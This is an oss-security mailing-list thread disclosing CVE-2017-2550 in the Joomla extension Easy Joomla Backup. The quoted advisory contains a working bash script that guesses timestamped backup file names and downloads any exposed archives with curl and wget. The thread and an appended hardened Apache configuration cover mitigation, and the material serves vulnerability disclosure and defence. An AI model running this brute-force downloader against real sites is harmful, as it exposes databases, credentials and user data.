
List:       oss-security
Subject:    Re: [oss-security] Joomla extension Easy Joomla Backup v3.2.4 database backup exposure
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2017-09-28 16:05:40
Message-ID: 28E19EE5-7EC0-4712-80CE-5D2AD4C4B932 () me ! com

Hi David,

This is correct, hardened shared hosting platforms won't be vulnerable to this attack.

I've now updated the configuration on my lab Ubuntu system by changing apache2.conf:

# diff -Nur orig apache2.conf 
--- orig	2017-09-28 12:02:13.674668975 -0400
+++ apache2.conf	2017-09-28 11:47:50.898322778 -0400
@@ -163,7 +163,7 @@
 
 <Directory /var/www/>
 	Options Indexes FollowSymLinks
-	AllowOverride None
+	AllowOverride All
 	Require all granted
 </Directory>
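Review bot: `AllowOverride All` in the second hunk line is broader than the mitigation needs. The extension's `.htaccess` uses `deny from all`, which belongs to the `Limit` override class, so `AllowOverride Limit` (add `AuthConfig` if the file also carries a `Require` directive) keeps the rest of the per-directory override surface closed. Also, `deny from all` is Apache 2.2 access-control syntax; on the Apache 2.4 that ships with current Ubuntu it is only honoured while `mod_access_compat` is loaded, so check that module is enabled or that the `.htaccess` also carries `Require all denied`. Finally, the unchanged context line `Options Indexes FollowSymLinks` leaves directory listing enabled for `/var/www/`, which would list the backup directory's contents should the override ever fail to apply; `Options FollowSymLinks` (or `-Indexes`) closes that.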

Thanks,
Larry

> On Sep 28, 2017, at 9:09 AM, David Jardin <david.jardin@community.joomla.org> wrote:
> 
> It's worth mentioning that the extension has a default .htaccess file with a „deny from all" in the backup directory, that will mitigate the described attack on pretty much any standard shared-hosting platform that I'm aware of. 
> 
> 
> 
> On 28 September 2017 at 14:37:20, Larry W. Cashdollar (larry0@me.com) wrote:
> 
> > Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure 
> > Author: Larry W. Cashdollar, @_larry0 
> > Date: 2017-09-07 
> > CVE-ID:[CVE-2017-2550] 
> > Download Site: https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup 
> > Vendor: kubik-rubik 
> > Vendor Notified: 2017-09-07 
> > Vendor Contact: 
> > Advisory: http://www.vapidlabs.com/advisory.php?v=200 
> > Description: Easy Joomla Backup creates 'old-school' backups without any frills. 
> > Vulnerability: 
> > The software creates a copy of the backup in the web root. The file name is easily guessable as it's just a time stamp:
> > http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip
> > 
> > Exploit Code: 
> > #!/bin/bash
> > #Larry W. Cashdollar, @_larry0 9/7/2017
> > #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4
> > #https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
> > MONTH=09
> > DAY=07
> > YEAR=2017
> > Z=0
> > #May need to set the DOMAIN to $1 the target depending on how WP is configured.
> > DOMAIN=192.168.0.163
> > 
> > echo "Scanning website for available backups:"
> > for y in `seq -w 0 23`; do
> >   for x in `seq -w 0 59`; do
> >     Y=`echo "scale=2;($Z/86000)*100"|bc`;
> >     echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%"
> >     for z in `seq -w 0 59`; do
> >       Z=$(( $Z + 1 ));
> >       CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
> >       RESULT=`curl -s --head $CPATH|grep 200`;
> >       if [ -n "$RESULT" ]; then
> >         echo ""
> >         echo "[+] Location $CPATH Found";
> >         echo "[+] Received $RESULT";
> >         echo "Downloading......";
> >         wget $CPATH
> >       fi;
> >     done
> >   done
> > done
> > echo "Completed."
> -- 
> Kind Regards,
> David Jardin
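
The thread above turns on whether the extension's `.htaccess` is honoured, which in turn depends on the server's `AllowOverride` setting. As an added example (not from either mail, and not a file shipped by the extension or the Joomla project), this is the Apache 2.4 configuration a defender would apply instead of the blanket `AllowOverride All` shown in the diff: the weak `/var/www/` block is kept as a comment for comparison, the hardened one grants only the override classes the mitigation needs, and a server-level deny on the backups directory removes the dependence on `.htaccess` processing altogether. The backups path is assumed from the advisory's URL under a `/var/www/html` DocumentRoot; adjust it to the real install.

```apache
# Weak (the /var/www/ block from the diff, after the change): directory listing
# stays on and every class of .htaccess directive is honoured site-wide.
#<Directory /var/www/>
#    Options Indexes FollowSymLinks
#    AllowOverride All
#    Require all granted
#</Directory>

# Hardened: no directory listings, and only the override classes the
# extension's .htaccess actually needs. "deny from all" (Apache 2.2 syntax,
# needs mod_access_compat on 2.4) falls under Limit; "Require all denied"
# (Apache 2.4 syntax) falls under AuthConfig.
<Directory /var/www/>
    Options FollowSymLinks
    AllowOverride Limit AuthConfig
    Require all granted
</Directory>

# Belt and braces: deny the backup directory in the server configuration
# itself, so the protection holds even if .htaccess processing is switched
# off or the extension's file is removed. Path is an assumption based on the
# advisory's URL; replace it with the actual DocumentRoot.
<Directory "/var/www/html/administrator/components/com_easyjoomlabackup/backups">
    Require all denied
</Directory>
```

With this in place, a `curl -I` against a backup URL should return 403 rather than 200 regardless of whether the `.htaccess` is present. If you maintain the `.htaccess` yourself, carrying both `Require all denied` (inside `<IfModule mod_authz_core.c>`) and `deny from all` (inside `<IfModule !mod_authz_core.c>`) keeps it working on both the 2.2 and 2.4 access-control models.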


